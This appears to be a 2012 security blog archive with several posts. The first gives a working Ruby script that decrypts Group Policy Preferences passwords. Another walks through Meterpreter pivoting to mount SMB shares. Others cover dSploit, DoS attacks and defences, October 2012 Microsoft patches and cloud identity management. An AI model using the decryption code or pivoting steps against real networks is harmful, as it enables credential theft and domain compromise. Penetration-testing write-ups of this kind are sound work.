Friday, October 19, 2012

Group Policy Preferences and Getting Your Domain 0wned

Group Policy Preferences and Getting Your Domain 0wned: So i put this link out on twitter but forgot to put it on the blog.

I did a talk at the Oct 20012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

 I've run into this on a few tests where people are taking advantage of this exteremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)

 So here are the slides:

Exploiting Group Policy Preferences from chrisgates

Blog post explaining the issue in detail:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

Metasploit post module:
http://metasploit.com/modules/post/windows/gather/credentials/gpp

PowerShell module to do it:
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html

I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part.  now you can do it yourself:


require 'rubygems'
require 'openssl'
require 'base64'


encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"

def decrypt(encrypted_data)
padding = "=" * (4 - (encrypted_data.length % 4))
epassword = "#{encrypted_data}#{padding}"
decoded = Base64.decode64(epassword)

key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
aes.decrypt
aes.key = key
plaintext = aes.update(decoded)
plaintext << aes.final
pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion

return pass
end

blah = decrypt(encrypted_data)
puts blah


In Action:

user@ubuntu:~$ ruby gpp-decrypt-string.rb
Local*P4ssword!

Thursday, October 18, 2012

DerbyCon 2012 - Security Vulnerability Assessments – Process and Best Practices

DerbyCon 2012 - Security Vulnerability Assessments – Process and Best Practices: Conducting regular security assessments on the organizational network and computer systems has become a vital part of protecting information-computing assets. Security assessments are a proactive and offensive posture towards information security as compared to the traditional reactive and defensive stance normally implemented with the use of Access Control-Lists (ACLs) and firewalls.

Too effectively conduct a security assessment so it is beneficial to an organization, a proven methodology must be followed so the assessors and assesses are on the same page.

This presentation will evaluate the benefits of credential scanning, scanning in a virtual environment, distributed scanning as well as vulnerability management.

BIO:
Kellep Charles (@kellepc) is the creator and Executive Editor of SecurityOrb.com (@SecurityOrb), an information security & privacy knowledge-based website with the mission to share and raise awareness of the motives, tools and tactics of the black-hat community, and provide best practices and counter measures against malicious events.
Kellep works as a government contractor in the Washington, DC area as an Information Security Analyst with over 15 years of experience in the areas of incident response, computer forensics, security assessments, malware analyst and security operations.
Currently he is completing his Doctorate in Information Assurance at Capitol College with a concentration in Artificial Neural Networks (ANN) and Human Computer Interaction (HCI). He also holds a Master of Science in Telecommunication Management from the University of Maryland University College and a Bachelor of Science in Computer Science from North Carolina Agriculture and Technical State University.

He has served as an Adjunct Professor at Capitol College in their Computer Science department. His industry certifications include Certified Information Systems Security Professional (CISSP), Cisco Certified Network Associate (CCNA), Certified Information Systems Auditor (CISA), National Security Agency – INFOSEC Assessment Methodology (NSA-IAM) and Information Technology Infrastructure Library version 3 (ITILv3) to name a few.

Wigle Wifi Wardriving meets Google Earth for Neat Wifi Maps

First take your handy dandy Android device and install  Wigle Wifi Wardriving.

It uses the internal GPS and wifi to log access points, their security level and their GPS Position.

looks like this (yup i stole these)

List of access points

Also makes a cute map on your phone

once you have the APs you can export out the "run" from the data section. yes yes, the stolen photo says "settings" but if you install it today it will say "data" there now.

With the KML export you can import that directly into google earth and make all sorts of neat maps by toggling the data.

All Access Points

Open Access Points

WEP Encrypted Access Points

That's it.

-CG




Mounting SMB shares over Meterpreter


Ok, this is pretty straight forward no magic:
Screen Shot 2012 10 17 at 11 00 16 AM
Got a shell, doesn't have to be SYSTEM
Screen Shot 2012 10 17 at 11 00 44 AM
Add a route to the internal range or directly to the host you want over the session you want
Screen Shot 2012 10 17 at 11 01 23 AM
Mosy on over  to the Socks4a module. And in another terminal we need to make sure our proxychains.conf file in /etc/ or where ever you store your conf is correct.
Screen Shot 2012 10 17 at 10 52 29 AM
It defaults to 9050 on 127.0.01 for Tor, that's pretty easy to cope with and no reason to mess with it if you actually use it for Tor for other things.
Screen Shot 2012 10 17 at 11 03 00 AM
Run the socks proxy with the Tor-like settings. (Remember to shutdown Tor first)
Screen Shot 2012 10 17 at 11 04 34 AM
And the rest is gravy. The % (percent sign if blog software mangles it) is a delimiter that smbclient and other samba tools recognize between user and password (so it doesn't prompt you for it).
And just to love it working:
Screen Shot 2012 10 17 at 11 04 53 AM
yay files.. Yes I know I didn't use smbmount but it works the same as well as rpcclient.
A side note here is if you are using the pth-tools from:
https://code.google.com/p/passing-the-hash/
You can use hashes instead of passwords for stuff like this. But who are we kidding? Who doesn't get clear text passwords anymore ;-)

Wednesday, October 10, 2012

dSploit - An Android network penetration suite

dSploit - An Android network penetration suite:
dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks
the most complete and advanced professional toolkit to perform network security assesments on a mobile device.





Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems
and running services, search for
known vulnerabilities, crack logon procedures of many tcp protocols, perform
man in the middle attacks such as
password sniffing ( with common protocols dissection ), real time traffic
manipulation
, etc, etc .





This application is still in beta stage, a stable release will be available as soon as possible, but expect
some crash or strange behaviour until then, in any case, feel free to submit an issue here on GitHub.


Requirements:

  • An Android device with at least the 2.3 ( Gingerbread ) version of the OS.
  • The device must be rooted.
  • The device must have a BusyBox full install, this means with every utility installed ( not the partial installation ). 
Available Modules



  • RouterPWN

    Launch the http://routerpwn.com/ service to pwn your router.
  • Port Scanner

    A syn port scanner to find quickly open ports on a single target.
  • Inspector

    Performs target operating system and services deep detection, slower than syn port scanner but more accurate.
  • Vulnerability Finder

    Search for known vulnerabilities for target running services upon National Vulnerability Database.
  • Login Cracker

    A very fast network logon cracker which supports many different services.
  • Packet Forger

    Craft and send a custom TCP or UDP packet to the target.
  • MITM

    A set of man-in-the-middle tools to command&conquer the whole network .  


Download: https://github.com

    Defending Against DoS Attacks: Defense Part 1, the Network

    Defending Against DoS Attacks: Defense Part 1, the Network:
    In Attacks, we discussed both network-based and application-targeting Denial of Service (DoS) attacks. Given the radically different techniques between the types, it’s only logical that we use different defense strategies for each type. But be aware that aspects of both network-based and application-targeting DoS attacks are typically combined for maximum effect. So your DoS defenses need to be comprehensive, protecting against (aspects of) both types. Anti-DoS products and services you will consider defend against both. This post will focus on defending against network-based volumetric attacks.

    First the obvious: you cannot just throw bandwidth at the problem. Your adversaries likely have an unbounded number of bots at their disposal and are getting smarter at using shared virtual servers and cloud instances to magnify the amount of evil bandwidth at their disposal. So you can’t just hunker down and ride it out. They likely have a bigger cannon than you can handle. You need to figure out how to deal with a massive amount of traffic and separate good traffic from bad, while maintaining availability. Find a way to dump bad traffic before it hoses you somehow without throwing the baby (legitimate application traffic) out with the bathwater.

    We need to be clear about the volume we are talking about. Recent attacks have blasted upwards of 80-100gbps of network traffic at targets. Unless you run a peering point or some other network-based service, you probably don’t have that kind of inbound bandwidth. Keep in mind that even if you have big enough pipes, the weak link may be the network security devices connected to them. Successful DoS attacks frequently target network security devices and overwhelm their session management capabilities. Your huge expensive IPS might be able to handle 80gbps of traffic in ideal circumstances, but fall over due to session table overflow. Even if you could get a huge check to deploy another network security device in front of your ingress firewall to handle that much traffic, it’s probably not the right device for the job.

    Before you just call up your favorite anti-DoS service provider, ISP, or content delivery network (CDN) and ask them to scrub your traffic, that approach is no silver bullet either. It’s not like you can just flip a switch and have all your traffic instantly go through a scrubbing center. Redirecting traffic incurs latency, assuming you can even communicate with the scrubbing center (remember, your pipes are overwhelmed with attack traffic). Attackers choose a mix of network and application attacks based on what’s most effective in light of your mitigations.

    No, we aren’t only going to talk about more problems, but it’s important to keep everything in context. Security is not a problem you can ever solve – it’s about figuring out how much loss you can accept. If a few hours of downtime is fine, then you can do certain things to ensure you are back up within that timeframe. If no downtime is acceptable you will need a different approach. There are no right answers – just a series of trade-offs to manage to the availability requirements of your business, within the constraints of your funding and available expertise.

    Handling network-based attacks involves mixing and matching a number of different architectural constructs, involving both customer premise devices and network-based service offerings. Many vendors and service providers can mix and match between several offerings, so we don’t have a set of vendors to consider here. But the discussion illustrates how the different defenses play together to blunt an attack.

    Customer Premise-based Devices


    The first category of defenses is based around a device on the customer premises. These appliances are purpose-built to deal with DoS attacks. Before you turn your nose up at the idea of installing another box to solve such a specific problem, take another look at your perimeter. There is a reason you have all sorts of different devices. The existing devices already in your perimeter aren’t particularly well-suited to dealing with DoS attacks. As we mentioned, your IPS, firewall, and load balancers aren’t designed to manage an extreme number of sessions, nor are they particularly adept at dealing with obfuscated attack traffic which looks legitimate. Nor can other devices integrate with network providers (to automatically change network routes, which we will discuss later) – or include out-of-the-box DoS mitigation rules, dashboards, or forensics, built specifically to provide the information you need to ensure availability under duress.

    So a new category of DoS mitigation devices has emerged to deal with these attacks. They tend to include both optimized IPS-like rules to prevent floods and other network anomalies, and simple web application firewall capabilities which we will discuss in the next post. Additionally, we see a number of anti-DoS features such as session scalability, combined with embedded IP reputation capabilities, to discard traffic from known bots without full inspection. To understand the role of IP reputation, let’s recall how email connection management devices enabled anti-spam gateways to scale up to handle spam floods. It’s computationally expensive to fully inspect every inbound email, so dumping messages from known bad senders first enables inspection to focus on email that might be legitimate, and keeps mail flowing. The same methodology applies here.

    These devices should be as close to the perimeter as possible, to get rid of the maximum amount of traffic before the attack impacts anything else. Some devices can be deployed out-of-band as well, to monitor network traffic and pinpoint attacks. Obviously monitor-and-alert mode is less useful than blocking, which helps maintain availability in real time. And of course you will want a high-availability deployment – an outage due to a failed security device is likely to be even more embarrassing than simply succumbing to a DoS.

    But anti-DoS devices include their own limitations. First and foremost is the simple fact that if your pipes are overwhelmed, a device on your premises is irrelevant. Additionally, SSL attacks are increasing in frequency. It’s cheap for an army of bots to use SSL to encrypt all their attack traffic, but expensive for a network security device to terminate all SSL sessions and check all their payloads for attacks. That kind of computational cost arbitrage puts defenders in a world of hurt. Even load balancers, which are designed to terminate high SSL volumes, can face challenges dealing with SSL DoS attacks, due to session management limitations.

    So an anti-DoS device needs to integrate a number of existing capabilities such as IPS, network behavioral analysis, WAF, and SSL termination, combining them with highly scalable session management to cope with DoS attacks. And all that is still not enough – you will always be limited by the amount of bandwidth coming into your site. That brings us to network services, as a compliment to premise-based devices.

    Proxies & CDN


    The first service option most organizations consider is a Content Delivery Network (CDN). These services enhance web site performance by strategically caching content. Depending on the nature of your site, a CDN might be able to dramatically reduce your ingress network traffic – if they can cache much of your static content. They also offer some security capabilities, especially for dealing with DoS attacks. The CDN acts as a proxy for your web site, so the provider can protect your site by using its own massive bandwidth to cope with DoS attacks for you. They have significant global networks, so even a fairly large volumetric attack shouldn’t look much different than a busy customer day – say a software company patching an operating system for a hundred million customers. Their scale enables them to cope with much larger traffic onslaughts than your much smaller pipes. Another advantage of a CDN is its ability to obscure the real IP addresses of your site, making it more difficult for attackers to target your servers. CDNs can also handle SSL termination if you allow them to store your private keys.

    What’s the downside? Protecting each site individually. If one site is not running through the CDN, attackers can find it through some simple reconnaisance and blast the vulnerable site. Even for sites running through the CDN, if attackers can find your controlling IPs they can you directly, bypassing the CDN. Then you need to mitigate the attack directly. Attackers also can randomize web page and image requests, forcing the CDN to request what it thinks is dynamic content directly from your servers over and over again. These cache misses can effectively cause the CDN to attack your servers. Obviously you want the CDN to be smart enough to detect these attacks before they melt your pipes and servers.

    Also be wary of excessive bandwidth costs. At the low end of the market, CDNs charge a flat fee and just eat the bandwidth costs if a small site is attacked. But enterprise deals are a bit more involved, charging for both bandwidth and protection. A DoS attack can explode bandwidth costs, causing an “economic DoS”, and perhaps shutting down the site when the maximum threshold (by contract or credit card limit) is reached. When setting up contracts, make sure you get some kind of protection from excessive bandwidth charges in case of attack.

    Anti-DoS Service Providers


    CDN limitations require some organizations to consider more focused network-based anti-DoS service providers. These folks run scrubbing centers – big data centers with lots of anti-DoS mitigation gear to process inbound floods and keep sites available. You basically flip a switch to send your traffic through the scrubbing center once you detect an attack. This switch usually controls BGP routing, so as soon as DNS updates and the network converge the scrubbing center handles all inbound traffic. On the backend you receive legitimate traffic through a direct connection – GRE tunnels to leverage the Internet, or a dedicated network link from the scrubbing center. Obviously there is latency during redirection, so keep that in mind.

    But what does a scrubbing center actually do? The same type of analysis as a premise-based device. The scrubbing center manages sessions, drops traffic based on network telemetry and IP reputation, blocks application-oriented attacks, and otherwise keeps your site up and available. Most scrubbing centers have substantial anti-DoS equipment footprints, amortized across all their customers. You pay for what you need, when you need it, rather than overprovisioning your network and buying a bunch of anti-DoS equipment for whenever you are actually attacked.

    Getting back to our email security analogy, think of an anti-DoS service provider like an cloud email security service. Back in the early days of spam, most organizations implemented their own email security gateways to deal with spam. When the inbound volume of email overwhelmed the gateways, organizations had to deploy more gateways and email filter hardware. This made anti-spam gateways a good business, until a few service providers started selling cloud services to deal with the issue. Just route your mail through their networks, and only good stuff would actually get delivered to your email servers. Spam flood? No problem – it’s the provider’s problem. Obviously there are differences – particularly that email filtering is full-time, while DoS filtering is on-demand during attacks.

    There are, of course, issues with this type of service, aside from the inevitable latency, which causes disruption while you reroute traffic to the scrubbing center. Scrubbing centers have the same SSL requirement as CDNs: termination requires access to your private key. Depending on your security tolerance, this could be a serious problem. Many large sites have tons of certificates and can-cross sign keys for the scrubbing center, but it does complicate management of the service provider.

    You will also need to spell out a process for determining when to redirect traffic. We will talk about this more when we go through the DoS defense process, but it generally involves an internal workflow to detect emerging attacks, evaluation of the situation, and then a determination to move the traffic – typically rerouting via BGP. But if your anti-DoS provider uses the same equipment as you have on-site, that might offer proprietary signaling protocols to automatically shift traffic based on thresholds. Though some network operations folks don’t enjoy letting Skynet redirect their traffic through different networks. What could possibly go wrong with that?

    Selection of an anti-DoS service provider is a serious decision. We recommend a fairly formal procurement process, which enables you to understand the provider’s technical underpinnings, network architecture, available bandwidth, geographic distribution, ability to handle SSL attacks, underlying anti-DoS equipment, and support for various signaling protocols. Make sure you are comfortable with the robustness of their DNS infrastructure, because DNS is a popular target and critical to several defenses. Also pay close attention to process hand-offs, responsiveness of their support group, and their research capabilities (to track attackers and mitigate specific attacks).

    The Answer: All of the Above


    Ultimately your choice of network-based DoS mitigations will involves trade-offs. It is never good to over-generalize, but most organizations will be best suited by a hybrid approach, involving both a customer premise-based appliance and a contracting with a CDN or anti-DoS service provider to handle severe volumetric attacks. It is simply not cost-effective to run all your traffic through a scrubbing center constantly, and many DoS attacks target the application layer – demanding use of a customer premise device anyway.

    In terms of service provider defense, many organizations can (and should) get started with a CDN. The CDN may be more attractive initially for its performance benefits, with anti-DoS and WAF capabilities as nice extras. Until you are attacked – at which point, depending on the nature of the attack, the CDN may save your proverbial bacon. If you are battling sophisticated attackers, or have a complicated and/or enterprise class infrastructure, you are likely looking at contracting with a dedicated anti-DoS service provider. Again, this will usually be a retainer-based relationship which gives you the ability to route your traffic through the scrubbing center when necessary – paying when you are under attack and sending them traffic.

    All this assumes your sites reside within your data center. Cloud computing fundamentally alters the calculations, requiring different capabilities and architectures. If your apps reside in the cloud you don’t have a customer premise where you can install devices, so you would instead consider either virtual instance, routing traffic through your site before it hits the cloud, or using a CDN for all inbound traffic. You could also architect your cloud infrastructure to provision more instances as necessary to handle traffic, but it is easy to convert a DoS attack into an economic attack as you pay to scale up in order to handle bogus traffic. There are no clear answers yet – it is still very early in the evolution of cloud computing – but it is something to factor in as your application architects keep talking about this cloud thingy.

    Next we will address the application side of the DoS equation, before we wrap up with the DoS Defense process.

    - Mike Rothman
    (0) Comments

    Tuesday, October 9, 2012

    Microsoft Patch Tuesday, October 2012 – Legend of Zelda Edition

    Microsoft Patch Tuesday, October 2012 – Legend of Zelda Edition:
    Hope you enjoyed last months light patch Tuesday with only
    two bulletins as this month we are right back at it with seven bulletins
    covering everything from Elevation of Privilege, Denial of Service and Remote
    Code Execution. There is only one critical update this month but there is also
    the enforcement of 1024 bit digital certificates. Probably the most interesting
    patch this month involves Lync, Microsoft’s enterprise messaging system, if
    only for the reason that every time I read Lync I think Link, as in the hero of
    Nintendo’s Legend of Zelda which I spent way too much time playing back in the
    eighties.
    Much like Link needs to get keys to open doors in Hyrule
    Microsoft products will often use certificates to allow communication between
    products. As of today Microsoft products will reject any certificates with RSA
    keys of less than 1024 bits.  Microsoft
    has made an optional patch available for the last two months to enforce this
    rule but now it is no longer optional.
    Even if you are not using 512bit keys this is an excellent opportunity
    to update all your keys to 1024 bits or even more.
    KeyLoZ




    MS12-064 (KB 2742319)
    CRITICAL
    Remote Code Execution
    in Microsoft Word

    CVE-2012-0182
    CVE-2012-2528
    A specially crafted RTF file could allow an attacker to take
    complete control of a system to install their own programs, delete data or even
    create new accounts. (Sounds like something a WallMaster would do.)  The vulnerability is present in most versions
    of Microsoft Word 2003, 2007, 2010 and even Sharepoint Server 2010 SP1 and is
    caused by how Word handles memory when parsing certain files. This one can be a
    little tricky because Microsoft Word is set as the default mail reader in
    Outlook 2007 and 2010, which means that an attacker could leverage email as the
    attack vector to get you to open the specially crafted RTF file. This
    vulnerability has been hidden away in a dungeon (probably the Manji Dungeon)
    and has not yet been seen in the wild.
    WallmasterLoZ

    MS12-065 (KB 27546070)
    IMPORTANT
    Remote Code Execution
    in Microsoft Works

    CVE-2012-2550
    The last time I used Microsoft Works was version 2.0 on my
    Mac SE so I was surprised to learn that the current version is 9.0 and is still
    a supported and even a shipping product. Works 9.0 is still available at retail
    but is mostly used by OEMs to include with systems. If you are using Works 9.0
    you will want to pay attention to this one especially if you try to open
    Microsoft Word files with your version of Works.  When Works attempts to convert a Word file it
    can potentially cause system memory corruption that could allow an attacker to
    execute arbitrary code. If you are using an older version of Microsoft Works
    you should really think about upgrading. Microsoft doesn’t mention if the
    vulnerability exists in older versions or not since they are no longer
    supported, so to be safe you will want to upgrade.

    MS12-066 (KB 2741517)
    IMPORTANT
    Elevation of Privilege
    in HTML Sanitation

    CVE-2012-2520
    “But
    wait! All was not lost. A young lad appeared. He skillfully drove off Ganon’s
    henchmen and saved Impa from a fate worse than death. His name was Link.”
    Link_NES

    OK, this one affects more than just Lync but also Infopath,
    Communicator, SharePoint, Groove and Office Web Apps.  However as soon as I read Lync I immediately
    thought of our intrepid hero and his quest to save the lovely princess
    Zelda.  But instead of being hunted by
    the evil forces of Ganon this Lync is hunted by poorly sanitized HTML strings.
    The bad strings could allow cross-site scripting attacks that could run scripts
    in the context of the logged-on user.  If
    you try to get the full Lync update through Automatic Update you won’t find it.
    The update for Lync 2010 Attendee (user level install) has to be handled
    through a Lync session so the update is only available in the Microsoft
    Download Center.  This one has escaped
    the dungeon and has been seen on a limited basis in the wild. (Just hiding
    under the sand like a Peahat waiting to get you.)
    PeahatSprite

    MS12-067 (KB 2742321)
    IMPORTANT
    Remote Code Execution
    in Sharepoint FAST Search Server 2010

    CVE-2012-1766
    You only need to worry about this patch if you have the
    Advanced Filter Pack enabled on your FAST Search Server 2010 for SharePoint,
    it’s disabled by default.  Exploitation
    of this vulnerability could allow an attacker to run arbitrary code in the
    context of a user account with a restricted token (Orange Rupee?). The flaw is
    actually in the Oracle Outside-In libraries licensed from by Microsoft. This is
    at least the second recent vulnerability we have seen in these libraries. While
    this one has not yet been seen in the wild Microsoft thinks that code to
    exploit this vulnerability is likely to exist within the next thirty days.
    OrangeRupee

    MS12-068 (KB 2724197)
    IMPORTANT
    Elevation of Privilege
    in Windows Kernel

    CVE-2012-2529
    I hate reading “all supported releases of Microsoft
    Windows”, it sends shivers up my spine like a Stalfos. However, this statement was
    closely followed by “except Windows 8 and Windows Server 2012”, which isn’t
    much consolation, but I’ll take it. This is a classic elevation of privilege
    requiring an attacker to already have access to a system either through
    legitimate credentials or some other vulnerability.  Once inside an attacker could use this
    vulnerability to gain administrator level access.
    LoZ_Stalfos_gray

    MS12-069 (KB 2743555)
    IMPORTANT
    Denial of Service in
    Kerberos

    CVE-2012-2551
    Unlike MS12-068 that affects just about everything MS12-069 is
    only found in Windows 7 and Server
    2008 R2. A specially crafted session request to the Kerberos server could
    result in a denial of service. If you have a properly configured firewall in
    place it will help protect your network from external attacks, sort of like
    Link’s shield protects against Tektites. Of course that won’t do much good if
    the attacker is already inside your network.
    Tektite_LoZOrange

    MS12-070 (KB 2754849)
    IMPORTANT
    Elevation of Privilege
    in SQL Server

    CVE-2012-2552
    If you are running the SQL Server Reporting Service then you
    have a problem validating input parameters which if exploited could cause an
    elevation of privilege. The XSS filter in Internet Explorer 8, 9, and 10 can
    protect users against this attack if it
    is enable in the Intranet Zone, which is not the default. You can enable it by
    going to Internet Options -> Security Settings -> Intranet Zone -> Custom Level -> Enable XSS Filter or just apply the patch offered through Automatic Updates. If
    you decide to do neither and a user clicks on a specially crafted link in email
    or browses to a specially crafted webpage, well, game over.

    “Can
    Link really destroy Ganon and save princess Zelda?
    "Only
    your skill can answer that question. Good luck. Use the Triforce wisely."
    240px-Triforce_Logo


    Friday, October 5, 2012

    Defending Against DoS Attacks: The Attacks

    Defending Against DoS Attacks: The Attacks:
    Our first post built a case for considering availability as an aspect of security context, rather than only confidentiality and integrity. This has been driven by Denial of Service (DoS) attacks, which are used by attackers in many different ways, including extortion (using the threat of an attack), obfuscation (to hide exfiltration), hacktivism (to draw attention to a particular cause), or even friendly fire (when a promotion goes a little too well).

    Understanding the adversary and their motivation is one part of the puzzle. Now let’s look at the types of DoS attacks you may face – attackers have many arrows in their quivers, and use them all depending on their objectives and targets.

    Flooding the Pipes


    The first kind of Denial of Service attack is really a blunt force object. It’s basically about trying to oversubscribe the bandwidth and computing resources of network (and increasingly server) devices to impact resource availability. These attacks aren’t very sophisticated, but as evidenced by the ongoing popularity of volume-based attacks, fairly effective effective. These tactics have been in use since before the Internet bubble, leveraging largely the same approach. But they have gotten easier with bots to do the heavy lifting. Of course, this kind of blasting must be done somewhat carefully to maintain the usefulness of the bot, so bot masters have developed sophisticated approaches to ensure their bots avoid ISPs penalty boxes. So you will see limited bursts of traffic from each bot and a bunch of IP address spoofing to make it harder to track down where the traffic is coming from, but even short bursts from 100,000+ bots can flood a pipe.

    Quite a few specific techniques have been developed for volumetric attacks, but most look like some kind of flood. In a network context, the attackers focus on overfilling the pipes. Floods target specific protocols (SYN, ICMP, UDP, etc.), and work by sending requests to a target using the chosen protocol, but not acknowledging the response. Enough of these outstanding requests limit the target’s ability to communicate. But attackers need to stay ahead of Moore’s Law, because targets’ ability to handle floods has improved with processing power. So network-based attacks may include encrypted traffic, forcing the target to devote additional computational resources to process massive amounts of SSL traffic. Given the resource-intensive nature of encryption, this type of attack can melt firewalls and even IPS devices unless they are configured specifically for large-scale SSL support. We also see some malformed protocol attacks, but these aren’t as effective nowadays, as even unsophisticated network security perimeter devices drop bad packets at wire speed.

    These volume-based attacks are climbing the stack as well, targeting web servers by actually completing connection requests and then making simple GET request and resetting the connection over and over again, with approximately the same impact as a volumetric attack – over-consumption of resources effectively knocking down servers. These attacks may also include a large payload to further consume bandwidth. The now famous Low Orbit Ion Cannon, a favorite tool of the hacktivist crowd, has undertaken a similar evolution, first targeting network resources and proceeding to now target web servers as well. It gets even better – these attacks can be magnified to increase their impact by simultaneously spoofing the target’s IP address and requesting sessions from thousands of other sites, which then bury the target in a deluge of misdirected replies, further consuming bandwidth and resources.

    Fortunately defending against these network-based tactics isn’t overly complicated, as we will discuss in the next post, but without a sufficiently large network device at the perimeter to block these attacks or an upstream service provider/traffic scrubber to dump offending traffic, devices fall over in short order.

    Overwhelming the Application


    But attackers don’t only attack the network – they increasingly attack the applications as well, following the rest of attackers up the stack. Your typical n-tier web application will have some termination point (usually a web server), an application server to handle application logic, and then a database to store the data. Attackers can target all tiers of the stack to impact application availability. So let’s dig into each layer to see how these attacks work.

    The termination point is usually the first target in application DoS attacks. They started with simple GET floods as described above, but quickly evolved to additional attack vectors. The best known application DoS attack is probably RSnake’s Slowloris, which consumes web server resources by sending partial HTTP requests, effectively opening connections and then leaving the sessions open by sending additional headers at regular intervals. This approach is far more efficient than the GET flood, requiring only hundreds of requests at regular intervals rather than constant thousands, and only requires one device to knock down a large site. These application attacks have evolved over time and now send complete HTTP requests to evade IDS and WAF devices looking for incomplete HTTP requests, but they tamper with payloads to confuse applications and consume resources. As defenders learn the attack vectors and deploy defenses, attackers evolve their attacks. The cycle continues.

    Web server based attacks can also target weaknesses in the web server platform. For example the Apache Killer attack sends a malformed HTTP range request to take advantage of an Apache vulnerability. The Apache folks quickly patched the code to address this issue, but it shows how attackers target weaknesses in the underlying application stack to knock the server over. And of course unpatched Apache servers are still vulnerable today at many organizations. Similarly, the RefRef attack leverages SQL injection to inject a rogue .js file onto a server, which then hammers a backend database into submission with seemingly legitimate traffic originating from an application server. Again, application and database server patches are available for the underlying infrastructure, but vulnerability remains if either patch is missing.

    Attackers can also target legitimate application functionality. One example of such an attack targets the search capability within a web site. If an attacker scripts a series of overly broad searches, the application can waste a large amount of time polling the database and presenting results. Likewise, attackers can game shopping carts by opening many shopping sessions, adding thousands of items to each cart, constantly refreshing the carts, and then abandoning them. Unless the application is architected to handle these use cases efficiently, such attacks accomplish their goals. For most sites, failing to return search results or track shopping carts is a complete failure with severe business ramifications. Which is the success scenario for a DoS attack.

    The advantage to application attacks is their ability to evade many of the defenses put in place to stop DoS. Our Managing WAF series discussed WAF evasion, and IDS evasion is a similarly mature and effective attack discipline. These network security devices are little more than speed bumps to knowledgeable attackers, so developers need to ensure their applications can deal with the attacks. That’s another point we made in the Application Lifecycle Integration post.

    Targeting the Defenses


    Attackers can also perform some reconnaissance to learn about targets’ defenses in order to game them. For instance, financial institutions tend to do a lot of security monitoring due to severe regulatory oversight requirements, so if an attacker constantly loads web pages or enters dummy transactions they may manage to overwhelm the monitoring system. Does this impact application availability? Probably not, but it at least hampers the security team’s efforts to figure out what’s going on, providing an opportunity for another attack to exfiltrate data undetected.

    Impacting the Wallet


    An emerging DoS attack works economically even when it does not impair service availability. The so-called EDoS (economic denial of service) attack involves a focused attempt to increase the cost of the target’s technology infrastructure. In a network attack, bad guys take advantage of excessive bandwidth charges. So even if a target successfully defends against an attack, their bandwidth to mitigate a multi-gigabyte attack could cost as much or more than an outage. Similarly, if a target leverages public cloud infrastructure to auto-provision new instances as utilization thresholds are met, an application attack can have a substantial financial cost without ever threatening availability. One potential endgame for cloud-based attacks is reaching the target’s credit limit with their cloud provider, triggering an outage when the provider caps their usage.

    Attackers can mix and match a variety of different DoS attacks to achieve their goal of adversely impacting availability of an application or service. Next we will move on to tactics and approaches to defend against DoS, starting with network attacks.

    - Mike Rothman
    (2) Comments

    New Series: Understanding and Selecting Identity Management for Cloud Services

    New Series: Understanding and Selecting Identity Management for Cloud Services:

    Adrian and Gunnar here, kicking off a new series on Identity Management for Cloud Services.


    We have been hearing about Federated Identity and Single Sign-On services for the last decade, but demand for these features has only fully blossomed in the last few years, as companies have needed to integrate their internal identity management systems. The meanings of these terms has been actively evolving, under the influence of cloud computing. The ability to manage what resources your users can access outside your corporate network – on third party systems outside your control – is not just a simple change in deployment models; but a fundamental shift in how we handle authentication, authorization, and provisioning. Enterprises want to extend capabilities to their users of low-cost cloud service providers – while maintaining security, policy management, and compliance functions. We want to illuminate these changes in approach and technology. And if you have not been keeping up to date with these changes in the IAM market, you will likely need to unlearn what you know. We are not talking about making your old Active Directory accessible to internal and external users, or running LDAP in your Amazon EC2 constellation. We are talking about the fusion of multiple identity and access management capabilities – possibly across multiple cloud services. We are gaining the ability to authorize users across multiple services, without distributing credentials to each and every service provider.


    Cloud services – be they SaaS, PaaS, or IaaS – are not just new environments in which to deploy existing IAM tools. They fundamentally shift existing IAM concepts. It’s not just the way IT resources are deployed in the cloud, or the way consumers want to interact with those resources, which have changed, but those changes are driven by economic models of efficiency and scale. For example enterprise IAM is largely about provisioning users and resources into a common directory, say Active Directory or RACF, where the IAM tool enforces access policy. The cloud changes this model to a chain of responsibility, so a single IAM instance cannot completely mediate access policy. A cloud IAM instance has a shared responsibility in – as an example – assertion or validation of identity. Carving up this set of shared access policy responsibilities is a game changer for the enterprise.


    We need to rethink how we manage trust and identities in order to take advantage of elastic, on-demand, and widely available web services for heterogenous clients. Right now, behind the scenes, new approaches to identity and access management are being deployed – often seamlessly into cloud services we already use. They reduce the risk and complexity of mapping identity to public or semi-public infrastructure, while remaining flexible enough to take full advantage of multiple cloud service and deployment models.


    Our goal for this series is to illustrate current trends and technologies that support cloud identity, describe the features available today, and help you navigate through the existing choices. The series will cover:


    • The Problem Space: We will introduce the issues that are driving cloud identity – from fully outsourced, hybrid, and proxy cloud services and deployment models. We will discuss how the cloud model is different than traditional in-house IAM, and discuss issues raised by the loss of control and visibility into cloud provider environments. We will consider the goals of IAM services for the cloud – drilling into topics including identity propagation, federation, and roles and responsibilities (around authentication, authorization, provisioning, and auditing). We will wrap up with the security goals we must achieve, and how compliance and risk influence decisions.
    • The Cloud Providers: For each of the cloud service models (SaaS, PaaS, and IaaS) we will delve into the IAM services built into the infrastructure. We will profile IAM offerings from some of the leading independent cloud identity vendors for each of the service models – covering what they offer and how their features are leveraged or integrated. We will illustrate these capabilities with a simple chart that shows what each provides, highlighting the conceptual model each vendor embraces to supply identity services. We will talk about what you will be responsible for as a customer, in terms of integration and management. This will include some of the deficiencies of these services, as well as areas to consider augmenting.
    • Use Cases: We will discuss three of the principal use cases we see today, as organizations move existing applications to the cloud and develop new cloud services. We will cover extending existing IAM systems to cover external SaaS services, developing IAM for new applications deployed on IaaS/PaaS, and adopting Identity as a Service for fully external IAM.
